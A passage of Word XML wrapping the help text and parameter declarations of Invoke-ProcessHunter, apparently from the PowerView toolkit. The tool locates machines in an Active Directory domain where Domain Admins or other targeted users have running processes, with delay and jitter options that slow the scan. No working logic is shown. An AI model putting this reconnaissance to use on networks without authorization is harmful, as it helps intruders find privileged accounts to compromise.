    </w:p>
    <w:p w14:paraId="6C0047DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61D22CFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57151D8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BD881" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="274DB9BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB3836" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5408646E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of usernames to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101B0B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18E46340" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER StopOnSuccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC045C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47418742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Stop hunting after finding after finding a target user/process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EED002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FAEBF2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE93B7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="079B8327" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74031BBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="364C7183" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB83A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27E5BDE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3683D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04B2C8C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD1AE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C8D50D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462B11A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1931155A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CEE8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A2823F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain for query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F86990" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14F680F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD9044" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="36545E11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA97217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="488AB3DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ShowAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2351D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4207B185" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return all user location results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32244B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AA71714" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D3F32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DDE2E58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA49CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923B624" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A0F385A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1B427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="779925BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949C151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D8A0B6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E54DFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EED79EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AD6C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target machine/domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE8928" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10A0767C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE3A4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C3F9236" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ProcessHunter -Domain 'testing'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8ED5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2617217E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines on the 'testing' domain where domain admins have a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C994A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        running process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141A6C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EA782D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5389E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EDE89A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ProcessHunter -Threads 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52EB76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A1FDF03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Multi-threaded process hunting, replaces Invoke-ProcessHunterThreaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB6B6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38151FD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72925C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F658972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ProcessHunter -UserFile users.txt -ComputerFile hosts.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556B2D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1755BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines in hosts.txt where any members of users.txt have running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4134FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A9505" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2153A2C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209799F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72FA2FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ProcessHunter -GroupName "Power Users" -Delay 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03033034" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CEB39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find machines on the domain where members of the "Power Users" groups have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B8A342" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        running processes with a 60 second (+/- *.3) randomized delay between</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BD246" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        touching each host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EA338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EE86261" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412DE35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02E36F39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E9A9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EEB975" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="194D7301" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41BB5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BDBBFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1FDFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D93F94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168EFD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C644EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E4F23EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21D6D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B1838" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D05C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48731FD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0399940A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0ECB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1530D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66FEBF0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F462F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B856045" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66CAF5EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13499483" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $ProcessName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D33265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29410723" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB9744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = 'Domain Admins',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA6E578" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46BDF74C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4FC20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetServer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008FF1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="142FCAD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08845349" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577BDED0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="461FB81A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E69A35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6B826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32C35BED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA6FF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494FFB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0321D0F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43596466" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D7565" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D9A75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F5B2A28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D2E73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StopOnSuccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BDD86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="708E3F29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19EDCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C48626" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="735B2DE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBF4EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEFAFAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1532F3DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2165D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0C6A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0831B87B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F08EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02860F18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BFDB899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FBE37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5145D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EF0CDF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771AC23D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ShowAll,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A96DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D9AB477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
